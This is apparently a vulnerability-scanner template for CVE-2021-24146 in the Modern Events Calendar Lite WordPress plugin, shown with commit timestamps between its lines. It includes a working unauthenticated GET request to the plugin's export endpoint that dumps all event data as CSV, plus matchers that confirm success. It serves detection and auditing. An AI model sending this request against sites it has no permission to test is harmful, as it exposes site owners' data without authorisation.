2021-04-23 03:17:52 +00:00
id : CVE-2021-24146
2021-04-22 19:15:52 +00:00
info :
name : Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export
author : random_robbie
2021-04-23 03:17:52 +00:00
severity : high
2022-04-22 10:38:41 +00:00
description : Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, did not properly restrict access to the export files, allowing unauthenticated users to exports
all events data in CSV or XML format for example.
reference :
- https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-24146
cwe-id : CWE-284
2022-04-22 10:38:41 +00:00
tags : wordpress,wp-plugin,cve,cve2021
2021-04-22 19:15:52 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"
matchers-condition : and
matchers :
- type : word
words :
- "mec-events"
2021-06-17 01:16:54 +00:00
- "text/csv"
condition : and
2021-04-22 19:15:52 +00:00
part : header
2021-04-23 03:08:45 +00:00
2021-04-22 19:15:52 +00:00
- type : status
status :
- 200